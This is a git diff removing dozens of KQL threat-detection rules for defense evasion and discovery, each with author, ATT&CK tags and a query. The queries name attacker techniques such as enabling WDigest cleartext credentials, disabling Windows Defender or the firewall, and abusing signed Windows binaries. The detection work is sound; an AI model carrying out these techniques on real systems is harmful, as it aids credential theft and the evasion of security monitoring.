Evasion/UtilityFunctions.ps1_Proxy_Dll.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/05/28 -// Level: medium -// Description: Detects the use of a Microsoft signed script executing a managed DLL with PowerShell. -// Tags: attack.defense_evasion, attack.t1216 -DeviceProcessEvents -| where ProcessCommandLine contains "UtilityFunctions.ps1" or ProcessCommandLine contains "RegSnapin " \ No newline at end of file diff --git a/Defense Evasion/Verclsid.exe_Runs_COM_Object.kql b/Defense Evasion/Verclsid.exe_Runs_COM_Object.kql deleted file mode 100644 index df845624..00000000 --- a/Defense Evasion/Verclsid.exe_Runs_COM_Object.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, oscd.community -// Date: 2020/10/09 -// Level: medium -// Description: Detects when verclsid.exe is used to run COM object via GUID -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains "/S" and ProcessCommandLine contains "/C") and (FolderPath endswith "\\verclsid.exe" or ProcessVersionInfoOriginalFileName =~ "verclsid.exe") \ No newline at end of file diff --git a/Defense Evasion/Visual_Basic_Command_Line_Compiler_Usage.kql b/Defense Evasion/Visual_Basic_Command_Line_Compiler_Usage.kql deleted file mode 100644 index cd684dd2..00000000 --- a/Defense Evasion/Visual_Basic_Command_Line_Compiler_Usage.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative -// Date: 2020/10/07 -// Level: high -// Description: Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter. -// Tags: attack.defense_evasion, attack.t1027.004 -DeviceProcessEvents -| where FolderPath endswith "\\cvtres.exe" and InitiatingProcessFolderPath endswith "\\vbc.exe" \ No newline at end of file diff --git a/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql b/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql deleted file mode 100644 index 76373e3d..00000000 --- a/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/01/11 -// Level: medium -// Description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary -// Tags: attack.execution, attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe" \ No newline at end of file diff --git a/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql b/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql deleted file mode 100644 index 275a6408..00000000 --- a/Defense Evasion/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) -// Date: 2023/04/11 -// Level: medium -// Description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries -// Tags: attack.execution, attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "Microsoft.NodejsTools.PressAnyKey.exe" and (not(FolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe")) \ No newline at end of file diff --git a/Defense Evasion/WMIC_Loading_Scripting_Libraries.kql b/Defense Evasion/WMIC_Loading_Scripting_Libraries.kql deleted file mode 100644 index 0a3175de..00000000 --- a/Defense Evasion/WMIC_Loading_Scripting_Libraries.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/10/17 -// Level: medium -// Description: Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc). -// Tags: attack.defense_evasion, attack.t1220 -DeviceImageLoadEvents -| where (FolderPath endswith "\\jscript.dll" or FolderPath endswith "\\vbscript.dll") and InitiatingProcessFolderPath endswith "\\wmic.exe" \ No newline at end of file diff --git a/Defense Evasion/WSL_Child_Process_Anomaly.kql b/Defense Evasion/WSL_Child_Process_Anomaly.kql deleted file mode 100644 index 83b49b76..00000000 --- a/Defense Evasion/WSL_Child_Process_Anomaly.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/23 -// Level: medium -// Description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL -// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where (InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wslhost.exe") and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "C:\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\")) \ No newline at end of file diff --git a/Defense Evasion/Wab_Execution_From_Non_Default_Location.kql b/Defense Evasion/Wab_Execution_From_Non_Default_Location.kql deleted file mode 100644 index 0ce9c87e..00000000 --- a/Defense Evasion/Wab_Execution_From_Non_Default_Location.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/12 -// Level: high -// Description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity -// Tags: attack.defense_evasion, attack.execution -DeviceProcessEvents -| where (FolderPath endswith "\\wab.exe" or FolderPath endswith "\\wabmig.exe") and (not((FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Program Files\\Windows Mail\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Mail\\"))) \ No newline at end of file diff --git a/Defense Evasion/Wdigest_CredGuard_Registry_Modification.kql b/Defense Evasion/Wdigest_CredGuard_Registry_Modification.kql deleted file mode 100644 index 4339d55a..00000000 --- a/Defense Evasion/Wdigest_CredGuard_Registry_Modification.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2019/08/25 -// Level: high -// Description: Detects potential malicious modification of the property value of IsCredGuardEnabled from -HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. -This is usually used with UseLogonCredential to manipulate the caching credentials. - -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryKey endswith "\\IsCredGuardEnabled" \ No newline at end of file diff --git a/Defense Evasion/Wdigest_Enable_UseLogonCredential.kql b/Defense Evasion/Wdigest_Enable_UseLogonCredential.kql deleted file mode 100644 index a594a1fb..00000000 --- a/Defense Evasion/Wdigest_Enable_UseLogonCredential.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2019/09/12 -// Level: high -// Description: Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "WDigest\\UseLogonCredential" \ No newline at end of file diff --git a/Defense Evasion/Weak_or_Abused_Passwords_In_CLI.kql b/Defense Evasion/Weak_or_Abused_Passwords_In_CLI.kql deleted file mode 100644 index 495f7484..00000000 --- a/Defense Evasion/Weak_or_Abused_Passwords_In_CLI.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/14 -// Level: medium -// Description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. -An example would be a threat actor creating a new user via the net command and providing the password inline - -// Tags: attack.defense_evasion, attack.execution -DeviceProcessEvents -| where ProcessCommandLine contains "123456789" or ProcessCommandLine contains "123123qwE" or ProcessCommandLine contains "Asd123.aaaa" or ProcessCommandLine contains "Decryptme" or ProcessCommandLine contains "P@ssw0rd!" or ProcessCommandLine contains "Pass8080" or ProcessCommandLine contains "password123" or ProcessCommandLine contains "test@202" \ No newline at end of file diff --git a/Defense Evasion/Windows_Binaries_Write_Suspicious_Extensions.kql b/Defense Evasion/Windows_Binaries_Write_Suspicious_Extensions.kql deleted file mode 100644 index fa5bb1a0..00000000 --- a/Defense Evasion/Windows_Binaries_Write_Suspicious_Extensions.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/12 -// Level: high -// Description: Detects Windows executables that write files with suspicious extensions -// Tags: attack.defense_evasion, attack.t1036 -DeviceFileEvents -| where (((InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\sihost.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\winlogon.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".ps1" or FolderPath endswith ".txt" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs")) or ((InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe") and (FolderPath endswith ".bat" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs"))) and (not(((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\dllhost.exe" and (FolderPath contains ":\\Users\\" and FolderPath contains "\\AppData\\Local\\Temp\\__PSScriptPolicyTest_") and FolderPath endswith ".ps1") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (FolderPath contains "C:\\Windows\\System32\\GroupPolicy\\DataStore\\" and FolderPath contains "\\sysvol\\" and FolderPath contains "\\Policies\\" and FolderPath contains "\\Machine\\Scripts\\Startup\\") and (FolderPath endswith ".ps1" or FolderPath endswith ".bat"))))) \ No newline at end of file diff --git a/Defense Evasion/Windows_Defender_Definition_Files_Removed.kql b/Defense Evasion/Windows_Defender_Definition_Files_Removed.kql deleted file mode 100644 index 0aebc2e2..00000000 --- a/Defense Evasion/Windows_Defender_Definition_Files_Removed.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/07/07 -// Level: high -// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where (ProcessCommandLine contains " -RemoveDefinitions" and ProcessCommandLine contains " -All") and (FolderPath endswith "\\MpCmdRun.exe" or ProcessVersionInfoOriginalFileName =~ "MpCmdRun.exe") \ No newline at end of file diff --git a/Defense Evasion/Windows_Defender_Exclusions_Added_-_Registry.kql b/Defense Evasion/Windows_Defender_Exclusions_Added_-_Registry.kql deleted file mode 100644 index 00caa0ec..00000000 --- a/Defense Evasion/Windows_Defender_Exclusions_Added_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/07/06 -// Level: medium -// Description: Detects the Setting of Windows Defender Exclusions -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceRegistryEvents -| where RegistryKey contains "\\Microsoft\\Windows Defender\\Exclusions" \ No newline at end of file diff --git a/Defense Evasion/Windows_Defender_Service_Disabled_-_Registry.kql b/Defense Evasion/Windows_Defender_Service_Disabled_-_Registry.kql deleted file mode 100644 index 4734ecfb..00000000 --- a/Defense Evasion/Windows_Defender_Service_Disabled_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali -// Date: 2022/08/01 -// Level: high -// Description: Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000004)" and RegistryKey endswith "\\Services\\WinDefend\\Start" \ No newline at end of file diff --git a/Defense Evasion/Windows_Firewall_Disabled_via_PowerShell.kql b/Defense Evasion/Windows_Firewall_Disabled_via_PowerShell.kql deleted file mode 100644 index 0cc30a00..00000000 --- a/Defense Evasion/Windows_Firewall_Disabled_via_PowerShell.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Rauch, Elastic (idea) -// Date: 2022/09/14 -// Level: medium -// Description: Detects attempts to disable the Windows Firewall using PowerShell -// Tags: attack.defense_evasion, attack.t1562 -DeviceProcessEvents -| where (ProcessCommandLine contains "Set-NetFirewallProfile " and ProcessCommandLine contains " -Enabled " and ProcessCommandLine contains " False") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains " -All " or ProcessCommandLine contains "Public" or ProcessCommandLine contains "Domain" or ProcessCommandLine contains "Private") \ No newline at end of file diff --git a/Defense Evasion/Windows_Kernel_Debugger_Execution.kql b/Defense Evasion/Windows_Kernel_Debugger_Execution.kql deleted file mode 100644 index 1742c500..00000000 --- a/Defense Evasion/Windows_Kernel_Debugger_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/15 -// Level: medium -// Description: Detects execution of the Windows Kernel Debugger "kd.exe". -// Tags: attack.defense_evasion, attack.privilege_escalation -DeviceProcessEvents -| where FolderPath endswith "\\kd.exe" or ProcessVersionInfoOriginalFileName =~ "kd.exe" \ No newline at end of file diff --git a/Defense Evasion/Windows_Processes_Suspicious_Parent_Directory.kql b/Defense Evasion/Windows_Processes_Suspicious_Parent_Directory.kql deleted file mode 100644 index 7905e6de..00000000 --- a/Defense Evasion/Windows_Processes_Suspicious_Parent_Directory.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: vburov -// Date: 2019/02/23 -// Level: low -// Description: Detect suspicious parent processes of well-known Windows processes -// Tags: attack.defense_evasion, attack.t1036.003, attack.t1036.005 -DeviceProcessEvents -| where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\lsaiso.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe") and (not((((InitiatingProcessFolderPath contains "\\Windows Defender\\" or InitiatingProcessFolderPath contains "\\Microsoft Security Client\\") and InitiatingProcessFolderPath endswith "\\MsMpEng.exe") or (isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath =~ "-") or ((InitiatingProcessFolderPath endswith "\\SavService.exe" or InitiatingProcessFolderPath endswith "\\ngen.exe") or (InitiatingProcessFolderPath contains "\\System32\\" or InitiatingProcessFolderPath contains "\\SysWOW64\\"))))) \ No newline at end of file diff --git a/Defense Evasion/Windows_Spooler_Service_Suspicious_Binary_Load.kql b/Defense Evasion/Windows_Spooler_Service_Suspicious_Binary_Load.kql deleted file mode 100644 index e0568272..00000000 --- a/Defense Evasion/Windows_Spooler_Service_Suspicious_Binary_Load.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: FPT.EagleEye, Thomas Patzke (improvements) -// Date: 2021/06/29 -// Level: informational -// Description: Detect DLL Load from Spooler Service backup folder -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574, cve.2021.1675, cve.2021.34527 -DeviceImageLoadEvents -| where (FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\3\\" or FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\4\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\spoolsv.exe" \ No newline at end of file diff --git a/Defense Evasion/Winget_Admin_Settings_Modification.kql b/Defense Evasion/Winget_Admin_Settings_Modification.kql deleted file mode 100644 index 4043350a..00000000 --- a/Defense Evasion/Winget_Admin_Settings_Modification.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/04/17 -// Level: low -// Description: Detects changes to the AppInstaller (winget) admin settings. Such as enabling local manifest installations or disabling installer hash checks -// Tags: attack.defense_evasion, attack.persistence -DeviceRegistryEvents -| where InitiatingProcessFolderPath endswith "\\winget.exe" and RegistryKey endswith "\\LocalState\\admin_settings" and RegistryKey startswith "\\REGISTRY\\A" \ No newline at end of file diff --git a/Defense Evasion/Winlogon_AllowMultipleTSSessions_Enable.kql b/Defense Evasion/Winlogon_AllowMultipleTSSessions_Enable.kql deleted file mode 100644 index 9143ea08..00000000 --- a/Defense Evasion/Winlogon_AllowMultipleTSSessions_Enable.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/09 -// Level: medium -// Description: Detects when the 'AllowMultipleTSSessions' value is enabled. -Which allows for multiple Remote Desktop connection sessions to be opened at once. -This is often used by attacker as a way to connect to an RDP session without disconnecting the other users - -// Tags: attack.persistence, attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryValueData endswith "DWORD (0x00000001)" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\AllowMultipleTSSessions" \ No newline at end of file diff --git a/Defense Evasion/Wlrmdr.EXE_Uncommon_Argument_Or_Child_Process.kql b/Defense Evasion/Wlrmdr.EXE_Uncommon_Argument_Or_Child_Process.kql deleted file mode 100644 index 5675cce0..00000000 --- a/Defense Evasion/Wlrmdr.EXE_Uncommon_Argument_Or_Child_Process.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113, manasmbellani -// Date: 2022/02/16 -// Level: medium -// Description: Detects the execution of "Wlrmdr.exe" with the "-u" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries. -This detection also focuses on any uncommon child processes spawned from "Wlrmdr.exe" as a supplement for those that posses "ParentImage" telemetry. - -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\wlrmdr.exe" or ((((ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s ") and (ProcessCommandLine contains "-f " or ProcessCommandLine contains "/f ") and (ProcessCommandLine contains "-t " or ProcessCommandLine contains "/t ") and (ProcessCommandLine contains "-m " or ProcessCommandLine contains "/m ") and (ProcessCommandLine contains "-a " or ProcessCommandLine contains "/a ") and (ProcessCommandLine contains "-u " or ProcessCommandLine contains "/u ")) and (FolderPath endswith "\\wlrmdr.exe" or ProcessVersionInfoOriginalFileName =~ "WLRMNDR.EXE")) and (not(((InitiatingProcessFolderPath in~ ("", "-")) or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\winlogon.exe")))) \ No newline at end of file diff --git a/Defense Evasion/Write_Protect_For_Storage_Disabled.kql b/Defense Evasion/Write_Protect_For_Storage_Disabled.kql deleted file mode 100644 index d0e57787..00000000 --- a/Defense Evasion/Write_Protect_For_Storage_Disabled.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Sreeman -// Date: 2021/06/11 -// Level: medium -// Description: Detects applications trying to modify the registry in order to disable any write-protect property for storage devices. -This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group. - -// Tags: attack.defense_evasion, attack.t1562 -DeviceProcessEvents -| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control" and ProcessCommandLine contains "Write Protection" and ProcessCommandLine contains "0" and ProcessCommandLine contains "storage" \ No newline at end of file diff --git a/Defense Evasion/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql b/Defense Evasion/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql deleted file mode 100644 index ec001999..00000000 --- a/Defense Evasion/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Sreeman -// Date: 2020/04/21 -// Level: medium -// Description: Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from. -// Tags: attack.t1211, attack.t1059, attack.defense_evasion, attack.persistence -DeviceProcessEvents -| where (ProcessCommandLine contains "echo" or ProcessCommandLine contains "copy" or ProcessCommandLine contains "type" or ProcessCommandLine contains "file createnew" or ProcessCommandLine contains "cacls") and ProcessCommandLine contains "C:\\Windows\\Fonts\\" and (ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh" or ProcessCommandLine contains ".reg" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl" or ProcessCommandLine contains ".inf" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".msi" or ProcessCommandLine contains ".vbs") \ No newline at end of file diff --git a/Defense Evasion/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql b/Defense Evasion/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql deleted file mode 100644 index bd2befa9..00000000 --- a/Defense Evasion/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/01 -// Level: medium -// Description: Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL - -// Tags: attack.defense_evasion, attack.execution, attack.t1218 -DeviceProcessEvents -| where (ProcessCommandLine contains ".xbap" and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe")) and (not((ProcessCommandLine contains " C:\\Windows\\" or ProcessCommandLine contains " C:\\Program Files"))) \ No newline at end of file diff --git a/Defense Evasion/XSL_Script_Execution_Via_WMIC.EXE.kql b/Defense Evasion/XSL_Script_Execution_Via_WMIC.EXE.kql deleted file mode 100644 index 206710d7..00000000 --- a/Defense Evasion/XSL_Script_Execution_Via_WMIC.EXE.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel -// Date: 2019/10/21 -// Level: medium -// Description: Detects the execution of WMIC with the "format" flag to potentially load XSL files. -Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. -Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. - -// Tags: attack.defense_evasion, attack.t1220 -DeviceProcessEvents -| where ((ProcessCommandLine contains "-format" or ProcessCommandLine contains "/format") and FolderPath endswith "\\wmic.exe") and (not((ProcessCommandLine contains "Format:List" or ProcessCommandLine contains "Format:htable" or ProcessCommandLine contains "Format:hform" or ProcessCommandLine contains "Format:table" or ProcessCommandLine contains "Format:mof" or ProcessCommandLine contains "Format:value" or ProcessCommandLine contains "Format:rawxml" or ProcessCommandLine contains "Format:xml" or ProcessCommandLine contains "Format:csv"))) \ No newline at end of file diff --git a/Defense Evasion/Xwizard.EXE_Execution_From_Non-Default_Location.kql b/Defense Evasion/Xwizard.EXE_Execution_From_Non-Default_Location.kql deleted file mode 100644 index b29fa211..00000000 --- a/Defense Evasion/Xwizard.EXE_Execution_From_Non-Default_Location.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Christian Burkard (Nextron Systems) -// Date: 2021/09/20 -// Level: high -// Description: Detects the execution of Xwizard tool from a non-default directory. -When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll". - -// Tags: attack.defense_evasion, attack.t1574.002 -DeviceProcessEvents -| where (FolderPath endswith "\\xwizard.exe" or ProcessVersionInfoOriginalFileName =~ "xwizard.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/Discovery/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql b/Discovery/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql deleted file mode 100644 index 5a91ee73..00000000 --- a/Discovery/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/23 -// Level: high -// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365. -// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential_access, attack.impact -DeviceProcessEvents -| where (ProcessCommandLine contains "Add-AADInt" or ProcessCommandLine contains "ConvertTo-AADInt" or ProcessCommandLine contains "Disable-AADInt" or ProcessCommandLine contains "Enable-AADInt" or ProcessCommandLine contains "Export-AADInt" or ProcessCommandLine contains "Get-AADInt" or ProcessCommandLine contains "Grant-AADInt" or ProcessCommandLine contains "Install-AADInt" or ProcessCommandLine contains "Invoke-AADInt" or ProcessCommandLine contains "Join-AADInt" or ProcessCommandLine contains "New-AADInt" or ProcessCommandLine contains "Open-AADInt" or ProcessCommandLine contains "Read-AADInt" or ProcessCommandLine contains "Register-AADInt" or ProcessCommandLine contains "Remove-AADInt" or ProcessCommandLine contains "Restore-AADInt" or ProcessCommandLine contains "Search-AADInt" or ProcessCommandLine contains "Send-AADInt" or ProcessCommandLine contains "Set-AADInt" or ProcessCommandLine contains "Start-AADInt" or ProcessCommandLine contains "Update-AADInt") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.Exe", "pwsh.dll"))) \ No newline at end of file diff --git a/Discovery/Active_Directory_Structure_Export_Via_Csvde.EXE.kql b/Discovery/Active_Directory_Structure_Export_Via_Csvde.EXE.kql deleted file mode 100644 index f4819e7d..00000000 --- a/Discovery/Active_Directory_Structure_Export_Via_Csvde.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/03/14 -// Level: medium -// Description: Detects the execution of "csvde.exe" in order to export organizational Active Directory structure. -// Tags: attack.exfiltration, attack.discovery, attack.t1087.002 -DeviceProcessEvents -| where ((FolderPath endswith "\\csvde.exe" or ProcessVersionInfoOriginalFileName =~ "csvde.exe") and ProcessCommandLine contains " -f") and (not(ProcessCommandLine contains " -i")) \ No newline at end of file diff --git a/Discovery/Advanced_IP_Scanner_-_File_Event.kql b/Discovery/Advanced_IP_Scanner_-_File_Event.kql deleted file mode 100644 index f1a91211..00000000 --- a/Discovery/Advanced_IP_Scanner_-_File_Event.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: @ROxPinTeddy -// Date: 2020/05/12 -// Level: medium -// Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. -// Tags: attack.discovery, attack.t1046 -DeviceFileEvents -| where FolderPath contains "\\AppData\\Local\\Temp\\Advanced IP Scanner 2" \ No newline at end of file diff --git a/Discovery/BloodHound_Collection_Files.kql b/Discovery/BloodHound_Collection_Files.kql deleted file mode 100644 index 2dd9a6ed..00000000 --- a/Discovery/BloodHound_Collection_Files.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: C.J. May -// Date: 2022/08/09 -// Level: high -// Description: Detects default file names outputted by the BloodHound collection tool SharpHound -// Tags: attack.discovery, attack.t1087.001, attack.t1087.002, attack.t1482, attack.t1069.001, attack.t1069.002, attack.execution, attack.t1059.001 -DeviceFileEvents -| where (FolderPath endswith "BloodHound.zip" or FolderPath endswith "_computers.json" or FolderPath endswith "_containers.json" or FolderPath endswith "_domains.json" or FolderPath endswith "_gpos.json" or FolderPath endswith "_groups.json" or FolderPath endswith "_ous.json" or FolderPath endswith "_users.json") and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and FolderPath endswith "\\pocket_containers.json" and FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft."))) \ No newline at end of file diff --git a/Discovery/Computer_Discovery_And_Export_Via_Get-ADComputer_Cmdlet.kql b/Discovery/Computer_Discovery_And_Export_Via_Get-ADComputer_Cmdlet.kql deleted file mode 100644 index d04369ff..00000000 --- a/Discovery/Computer_Discovery_And_Export_Via_Get-ADComputer_Cmdlet.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/11/10 -// Level: medium -// Description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file -// Tags: attack.discovery, attack.t1033 -DeviceProcessEvents 